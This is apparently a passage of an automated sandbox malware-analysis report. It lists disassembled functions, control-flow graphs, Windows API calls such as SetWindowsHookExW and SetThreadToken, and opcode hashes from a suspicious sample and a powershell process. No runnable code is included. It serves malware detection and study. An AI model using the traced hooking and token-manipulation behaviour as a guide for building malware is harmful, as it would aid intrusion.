                                                                    • Opcode ID: e225ee85a0f711af61598af850558325b8d6b9eb37dcf4e6bf2746fb0c6881e4
                                                                    • Instruction ID: 4597f0a7266429070ebf4f7ab6dca95084e174d337ba80aeae735b8857a0e186
                                                                    • Opcode Fuzzy Hash: e225ee85a0f711af61598af850558325b8d6b9eb37dcf4e6bf2746fb0c6881e4
                                                                    • Instruction Fuzzy Hash: 34419FB1D103499FDF54CF9AC884ADEBBB5BF48310F24862AE819AB250D775A845CF90
                                                                    Function 0669739C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1321 669739c-669b74c 1324 669b7fc-669b81c call 6697274 1321->1324 1325 669b752-669b757 1321->1325 1333 669b81f-669b82c 1324->1333 1326 669b759-669b790 1325->1326 1327 669b7aa-669b7e2 CallWindowProcW 1325->1327 1335 669b799-669b7a8 1326->1335 1336 669b792-669b798 1326->1336 1329 669b7eb-669b7fa 1327->1329 1330 669b7e4-669b7ea 1327->1330 1329->1333 1330->1329 1335->1333 1336->1335
                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0669B7D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: 20f8d29eb3a0b17c1c9ded8a2888194a7249e246802f9e9533f35d849f5d705f
                                                                    • Instruction ID: 4662cbedc021b1fa97bbb2b87c66209d42f53d1b5a9862744990f03470270cda
                                                                    • Opcode Fuzzy Hash: 20f8d29eb3a0b17c1c9ded8a2888194a7249e246802f9e9533f35d849f5d705f
                                                                    • Instruction Fuzzy Hash: 58413BB4900309DFDB94CF59C488AABBBF5FF88314F14C559D519AB321D775A841CBA0
                                                                    Function 0310E16C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1338 310e16c-310e77c DuplicateHandle 1340 310e785-310e7a2 1338->1340 1341 310e77e-310e784 1338->1341 1341->1340
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0310E6AE,?,?,?,?,?), ref: 0310E76F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4572476188.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_3100000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: c3132fb8be74ffbf2ee7fcc9283ace1ad9e0558f2dbe447f592fa07d3372feeb
                                                                    • Instruction ID: 4fb0547e18448bed0c3dfedb98cab3f56043193d4d42df88622d8c7160560875
                                                                    • Opcode Fuzzy Hash: c3132fb8be74ffbf2ee7fcc9283ace1ad9e0558f2dbe447f592fa07d3372feeb
                                                                    • Instruction Fuzzy Hash: CC21E4B5900249EFDB50CF9AD984AEEFBF4FB48320F14841AE918A7350D374A954CFA4
                                                                    Function 03107A20 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1344 3107a20-3107a72 1346 3107a74 1344->1346 1347 3107a7e-3107ab0 SetWindowsHookExW 1344->1347 1350 3107a7c 1346->1350 1348 3107ab2-3107ab8 1347->1348 1349 3107ab9-3107ade 1347->1349 1348->1349 1350->1347
                                                                    APIs
                                                                    • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 03107AA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4572476188.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_3100000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: 289b4cc87b82a21102deec4c197ab246130853d5a0749126013363c5452fdd67
                                                                    • Instruction ID: 449407451f77f1cdef6645b0d2f7b76571ca7c5e6f28932bf7e469334b5252e4
                                                                    • Opcode Fuzzy Hash: 289b4cc87b82a21102deec4c197ab246130853d5a0749126013363c5452fdd67
                                                                    • Instruction Fuzzy Hash: 722134B1D00209CFDB14CFAAD844BEEFBF5AB88310F14841AD419B7290C7B5A944CFA1
                                                                    Function 03107A28 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1354 3107a28-3107a72 1356 3107a74 1354->1356 1357 3107a7e-3107ab0 SetWindowsHookExW 1354->1357 1360 3107a7c 1356->1360 1358 3107ab2-3107ab8 1357->1358 1359 3107ab9-3107ade 1357->1359 1358->1359 1360->1357
                                                                    APIs
                                                                    • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 03107AA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4572476188.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_3100000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: 8aca58c65ea320908a224b6d054064c2d61b055074f8c0cb42e536b09b66c167
                                                                    • Instruction ID: 5780380081ba9c72d41352b31bc908b39580f27c139d6fc2c2ceb9a9983ffb49
                                                                    • Opcode Fuzzy Hash: 8aca58c65ea320908a224b6d054064c2d61b055074f8c0cb42e536b09b66c167
                                                                    • Instruction Fuzzy Hash: 792104B1D00249DFDB14DFAAC844BAEFBF5AB88320F148419D519A7290C7B5A944CFA1
                                                                    Function 058B4540 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1364 58b4540-58b4586 1366 58b458e-58b45bc GlobalMemoryStatusEx 1364->1366 1367 58b45be-58b45c4 1366->1367 1368 58b45c5-58b45ed 1366->1368 1367->1368
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,058B44C2), ref: 058B45AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4586654532.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_58b0000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    • Opcode ID: c022623976539abfd3a74af2e956dcdaee1a1f793561e0962eb9fd67b28a453e
                                                                    • Instruction ID: e2aa04c4a98527f990ac94ea65cb8a80d8d9de7a9b9ba0e6d1670cf13c389a2d
                                                                    • Opcode Fuzzy Hash: c022623976539abfd3a74af2e956dcdaee1a1f793561e0962eb9fd67b28a453e
                                                                    • Instruction Fuzzy Hash: 9C1136B1C006599BDB10CF9AC445BDEFBF5AF48720F10811AE918A7240D3B8A954CFA5
                                                                    Function 0669E838 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1371 669e838-669e83d 1372 669e840-669e8b5 PeekMessageW 1371->1372 1373 669e8be-669e8df 1372->1373 1374 669e8b7-669e8bd 1372->1374 1374->1373
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0669E45A,00000000,00000000,043840F8,03328010), ref: 0669E8A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePeek
                                                                    • String ID:
                                                                    • API String ID: 2222842502-0
                                                                    • Opcode ID: 002ee976738ecd42dafd704f55b3a7da7f69590a19be17ecef5fa260d92f1931
                                                                    • Instruction ID: aca0ab41f56b9cc0a79e9428bb3d8ceab322c0ae6cd9b1e46d29de4524abcb01
                                                                    • Opcode Fuzzy Hash: 002ee976738ecd42dafd704f55b3a7da7f69590a19be17ecef5fa260d92f1931
                                                                    • Instruction Fuzzy Hash: 962117B5C04249AFDB10CF9AD944BDEFBF8EB48320F14842AE958A3241C379A554CFB5
                                                                    Function 058B3BB8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,058B44C2), ref: 058B45AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4586654532.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_58b0000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    • Opcode ID: b92c6ab6b14ef220064d61b26774a5e0375d9d2c61e6b2ac05628b960feae231
                                                                    • Instruction ID: 0d04f4bb2f955bca6bc178c164d848062a11e162f72e8679bfa0d62fab683999
                                                                    • Opcode Fuzzy Hash: b92c6ab6b14ef220064d61b26774a5e0375d9d2c61e6b2ac05628b960feae231
                                                                    • Instruction Fuzzy Hash: 871106B1C0465A9BDB10CF9AC4457DEFBF4BF48320F10816AD918A7341D3B8AA54CFA1
                                                                    Function 0669CE98 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0669E45A,00000000,00000000,043840F8,03328010), ref: 0669E8A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePeek
                                                                    • String ID:
                                                                    • API String ID: 2222842502-0
                                                                    • Opcode ID: 10f728a16311984577a441c22b5ea087e0016b3082658ffa81f2bdfc746e1d31
                                                                    • Instruction ID: 0a93c6dc1a9f27bd5bf08c244851b96658a62f12595e4eded5b55b24e27328b3
                                                                    • Opcode Fuzzy Hash: 10f728a16311984577a441c22b5ea087e0016b3082658ffa81f2bdfc746e1d31
                                                                    • Instruction Fuzzy Hash: 9F1117B5C0424DDFDB50CF9AC944BDEBBF8EB48320F14842AE918A3251D379A554CFA5
                                                                    Function 06696D38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06696D9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: fa5ecc92406f9ed4328592bc6fbe6f2497f49b3490939f297092a7384ef09cd3
                                                                    • Instruction ID: a11105e9288a81651d182cafe4ad448e7f962e26833d1228683516ff4dbd4658
                                                                    • Opcode Fuzzy Hash: fa5ecc92406f9ed4328592bc6fbe6f2497f49b3490939f297092a7384ef09cd3
                                                                    • Instruction Fuzzy Hash: 6F11D2B5C007498FDB50CF9AC444BDEFBF8AB88224F20841AD829A7310D375A545CFA1
                                                                    Function 0176D450 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4568836061.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_176d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f2d2baaeed3b8ce4758aff05f47819bd904aef85e21f37fb1fccba1a3b153096
                                                                    • Instruction ID: 8c007ad65624014e490cf5e76646029969d1fd916dd20aec9488660a3cc62f0c
                                                                    • Opcode Fuzzy Hash: f2d2baaeed3b8ce4758aff05f47819bd904aef85e21f37fb1fccba1a3b153096
                                                                    • Instruction Fuzzy Hash: FB2124B2614240EFDB25DF54D9C0B26FF69FB88314F2481A8DD494A257C336D815CAA1
                                                                    Function 0177D0FC Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4569058115.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_177d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eea36f99bb826f1fd2034294b8084702dd74ee104bc6358134c122ed25b067f6
                                                                    • Instruction ID: 485cab030f19c7eb8d8bb997fd53b927c42aafa684ef25a71d3d87d63b147792
                                                                    • Opcode Fuzzy Hash: eea36f99bb826f1fd2034294b8084702dd74ee104bc6358134c122ed25b067f6
                                                                    • Instruction Fuzzy Hash: A92122B5604204EFDF25DF54E9C0B26FBA1FF88324F20C9ADD9094B252C37AD846CA61
                                                                    Function 0177D01C Relevance: .1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4569058115.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_177d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6d68f4d2d5c7bc5f333c78dbec881bcddce6aaf7f9c27313c26393fdf6625717
                                                                    • Instruction ID: 0a49beb5687530db6997797647777672cff1eae51f38b59b7e90c9dfded49af4
                                                                    • Opcode Fuzzy Hash: 6d68f4d2d5c7bc5f333c78dbec881bcddce6aaf7f9c27313c26393fdf6625717
                                                                    • Instruction Fuzzy Hash: 52212FB5604304EFDB26DF64C9C0B26FFA1EF84358F20C5ACD90A4B252C37AC846CA61
                                                                    Function 0176D44B Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4568836061.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_176d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                    • Instruction ID: 5ea6c106b45b6d93d0a3949a372e85798195c8b0f9d055ddff2a80124536b5ce
                                                                    • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                    • Instruction Fuzzy Hash: 5F11CD76504280CFCB12CF54D5C0B16BF61FB84314F2481A9DC494A657C33AD45ACBA1
                                                                    Function 0177D0F7 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4569058115.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_177d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                    • Instruction ID: ef5e5ab20f49b8ae7bbe484a3d23562f75b016beb1cac74771ad841876c25cde
                                                                    • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                    • Instruction Fuzzy Hash: 6611BB75504284CFDB16CF54EAC4B15FBA2FB84214F28C6A9D8094B656C33AD45ACB61
                                                                    Function 0177D017 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4569058115.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_177d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d995b00d00e55cd09380dc6b4dc9fcb0e4c86312f1f46f4d8748a8c7f78b6f4c
                                                                    • Instruction ID: 7b16fbabc797f33d36d683d7ead73c038a21730a1cdff4e823ed7bdd11031fd2
                                                                    • Opcode Fuzzy Hash: d995b00d00e55cd09380dc6b4dc9fcb0e4c86312f1f46f4d8748a8c7f78b6f4c
                                                                    • Instruction Fuzzy Hash: 3611DD75504284CFCB22CF24C5C0B15FFA1FB84318F24C6ADD8094B662C33AD44ACB92

                                                                    Execution Graph

                                                                    Execution Coverage:5.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:3
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 22123 8bd69b0 22124 8bd69f3 SetThreadToken 22123->22124 22125 8bd6a21 22124->22125

                                                                    Executed Functions

                                                                    Function 04BDB488 Relevance: 5.3, Strings: 4, Instructions: 256COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 210 4bdb488-4bdb4b1 211 4bdb4b6-4bdb7f1 call 4bda99c 210->211 212 4bdb4b3 210->212 273 4bdb7f6-4bdb7fd 211->273 212->211
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: SU6n^$cU6n^$sU6n^$\6n^
                                                                    • API String ID: 0-3022220743
                                                                    • Opcode ID: f834fe0cbdc533e9e1847e92ee65ac1c5bac17f5f2ffe9de3c8b9b56b0c381fa
                                                                    • Instruction ID: 9fed6337e4ce9b59c4e406e192e40fd477cb4eb401cf12d61eafd76f64105d74
                                                                    • Opcode Fuzzy Hash: f834fe0cbdc533e9e1847e92ee65ac1c5bac17f5f2ffe9de3c8b9b56b0c381fa
                                                                    • Instruction Fuzzy Hash: B191BC70F017559BEB19EFB488115AEBBA6EFC4700B41895DD246AB380EF74AD068BC1
                                                                    Function 04BDB498 Relevance: 5.3, Strings: 4, Instructions: 252COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 274 4bdb498-4bdb4b1 275 4bdb4b6-4bdb7f1 call 4bda99c 274->275 276 4bdb4b3 274->276 337 4bdb7f6-4bdb7fd 275->337 276->275
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: SU6n^$cU6n^$sU6n^$\6n^
                                                                    • API String ID: 0-3022220743
                                                                    • Opcode ID: ba22ddd63cde0941f1ad81e1259bf12a18ba04ce5ca944c3992233c6af01b127
                                                                    • Instruction ID: 3e4d42d4735782da99bb258e96ceff7f4cb5034a0b99437069ba4f84df9e77aa
                                                                    • Opcode Fuzzy Hash: ba22ddd63cde0941f1ad81e1259bf12a18ba04ce5ca944c3992233c6af01b127
                                                                    • Instruction Fuzzy Hash: A291BC70F017559BEB19EFB488015AEBBB6EFC4700B41895DD206AB380EF74AD058BC5
                                                                    Function 07832308 Relevance: 8.1, Strings: 6, Instructions: 641COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2230685913.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7830000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk$piRk$piRk$piRk$piRk$|,Tk
                                                                    • API String ID: 0-884015819
                                                                    • Opcode ID: f157b967e048566a3fee79e81f6dcad195dc9e1c88592b3b577fa94de460bea8
                                                                    • Instruction ID: 26e7617956493df9a286aa1fe6873d540dafc7dd9507a0f9c353a9fe03d90d80
                                                                    • Opcode Fuzzy Hash: f157b967e048566a3fee79e81f6dcad195dc9e1c88592b3b577fa94de460bea8
                                                                    • Instruction Fuzzy Hash: 452235B1B0020ADFDB219FACC4417AABBE5BFD5221F1484BAD905DB252DB35C845CBE1
                                                                    Function 08BD6980 Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 338 8bd6980-8bd698f 339 8bd6992-8bd6995 338->339 340 8bd69c5-8bd69c9 339->340 341 8bd6997-8bd69c3 339->341 340->339 342 8bd69ca-8bd69eb 340->342 341->340 343 8bd69f3-8bd6a1f SetThreadToken 342->343 344 8bd6a28-8bd6a45 343->344 345 8bd6a21-8bd6a27 343->345 345->344
                                                                    APIs
                                                                    • SetThreadToken.KERNELBASE(?,?), ref: 08BD6A12
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2233518129.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3254676861-0
                                                                    • Opcode ID: ddd37ebd9e617615f1bab483772106b93c301f590883f290e335797ea185a1b7
                                                                    • Instruction ID: d6f3ca7f7234365b7095658daa2b70beeb0214545783d7d0609b711fd13b4f27
                                                                    • Opcode Fuzzy Hash: ddd37ebd9e617615f1bab483772106b93c301f590883f290e335797ea185a1b7
                                                                    • Instruction Fuzzy Hash: 4521AEB6904389CFCB11CF69C8847DEBFF4EF59220F25849AD098A7251D6789945CBA0
                                                                    Function 08BD69B0 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 348 8bd69b0-8bd6a1f SetThreadToken 350 8bd6a28-8bd6a45 348->350 351 8bd6a21-8bd6a27 348->351 351->350
                                                                    APIs
                                                                    • SetThreadToken.KERNELBASE(?,?), ref: 08BD6A12
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2233518129.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3254676861-0
                                                                    • Opcode ID: 20cf6d07c71cadd03a39f6311b502b6a541a2f833bb50960dccad51b9be79b9d
                                                                    • Instruction ID: e646a07577a8f0f1a95c67b4d9e5751b76e9cce6f2a9b0a416cd3c2da92a0d5c
                                                                    • Opcode Fuzzy Hash: 20cf6d07c71cadd03a39f6311b502b6a541a2f833bb50960dccad51b9be79b9d
                                                                    • Instruction Fuzzy Hash: 281125B59007098FCB10CF9AC884BDEFBF8EB48320F24845AD518A7310D7B8A944CFA0
                                                                    Function 07833CE8 Relevance: .6, Instructions: 580COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 354 7833ce8-7833d0d 355 7833d13-7833d18 354->355 356 7833f00-7833f1e 354->356 357 7833d30-7833d34 355->357 358 7833d1a-7833d20 355->358 364 7833f20-7833f23 356->364 365 7833f28-7833f4a 356->365 362 7833eb0-7833eba 357->362 363 7833d3a-7833d3c 357->363 360 7833d22 358->360 361 7833d24-7833d2e 358->361 360->357 361->357 366 7833ec8-7833ece 362->366 367 7833ebc-7833ec5 362->367 368 7833d3e-7833d4a 363->368 369 7833d4c 363->369 364->365 370 7833f50-7833f55 365->370 371 78340ce-78340e6 365->371 372 7833ed0-7833ed2 366->372 373 7833ed4-7833ee0 366->373 375 7833d4e-7833d50 368->375 369->375 376 7833f57-7833f5d 370->376 377 7833f6d-7833f71 370->377 387 78340f0-7834112 371->387 388 78340e8-78340ee 371->388 378 7833ee2-7833efd 372->378 373->378 375->362 379 7833d56-7833d75 375->379 380 7833f61-7833f6b 376->380 381 7833f5f 376->381 384 7834080-783408a 377->384 385 7833f77-7833f79 377->385 409 7833d77-7833d83 379->409 410 7833d85 379->410 380->377 381->377 389 7834097-783409d 384->389 390 783408c-7834094 384->390 391 7833f7b-7833f87 385->391 392 7833f89 385->392 395 7834228-783424c 387->395 396 7834118-783411d 387->396 388->387 398 78340a3-78340af 389->398 399 783409f-78340a1 389->399 397 7833f8b-7833f8d 391->397 392->397 419 78341db-78341e4 395->419 420 783424e-783425d 395->420 401 7834135-7834139 396->401 402 783411f-7834125 396->402 397->384 404 7833f93-7833fb2 397->404 405 78340b1-78340cb 398->405 399->405 407 78341da 401->407 408 783413f-7834141 401->408 412 7834127 402->412 413 7834129-7834133 402->413 436 7833fc2 404->436 437 7833fb4-7833fc0 404->437 407->419 415 7834143-783414f 408->415 416 7834151 408->416 418 7833d87-7833d89 409->418 410->418 412->401 413->401 422 7834153-7834155 415->422 416->422 418->362 423 7833d8f-7833d96 418->423 426 78341f1-78341f7 419->426 427 78341e6-78341ee 419->427 424 783428b-7834295 420->424 425 783425f-7834281 420->425 422->407 430 783415b-783415d 422->430 423->356 431 7833d9c-7833da1 423->431 434 7834297-783429c 424->434 435 783429f-78342a5 424->435 464 7834283-7834288 425->464 465 78342d5-78342fe 425->465 432 78341f9-78341fb 426->432 433 78341fd-7834209 426->433 438 7834177-783417e 430->438 439 783415f-7834165 430->439 440 7833da3-7833da9 431->440 441 7833db9-7833dc8 431->441 443 783420b-7834225 432->443 433->443 444 78342a7-78342a9 435->444 445 78342ab-78342b7 435->445 447 7833fc4-7833fc6 436->447 437->447 453 7834180-7834186 438->453 454 7834196-78341d7 438->454 448 7834167 439->448 449 7834169-7834175 439->449 450 7833dab 440->450 451 7833dad-7833db7 440->451 441->362 468 7833dce-7833dec 441->468 446 78342b9-78342d2 444->446 445->446 447->384 460 7833fcc-7834003 447->460 448->438 449->438 450->441 451->441 456 783418a-7834194 453->456 457 7834188 453->457 456->454 457->454 482 7834005-783400b 460->482 483 783401d-7834024 460->483 480 7834300-7834326 465->480 481 783432d-783435c 465->481 468->362 478 7833df2-7833e17 468->478 478->362 501 7833e1d-7833e24 478->501 480->481 493 7834395-783439f 481->493 494 783435e-783437b 481->494 488 783400f-783401b 482->488 489 783400d 482->489 485 7834026-783402c 483->485 486 783403c-783407d 483->486 491 7834030-783403a 485->491 492 783402e 485->492 488->483 489->483 491->486 492->486 499 78343a1-78343a5 493->499 500 78343a8-78343ae 493->500 508 78343e5-78343ea 494->508 509 783437d-783438f 494->509 504 78343b0-78343b2 500->504 505 78343b4-78343c0 500->505 506 7833e26-7833e41 501->506 507 7833e6a-7833e9d 501->507 510 78343c2-78343e2 504->510 505->510 516 7833e43-7833e49 506->516 517 7833e5b-7833e5f 506->517 525 7833ea4-7833ead 507->525 508->509 509->493 519 7833e4b 516->519 520 7833e4d-7833e59 516->520 522 7833e66-7833e68 517->522 519->517 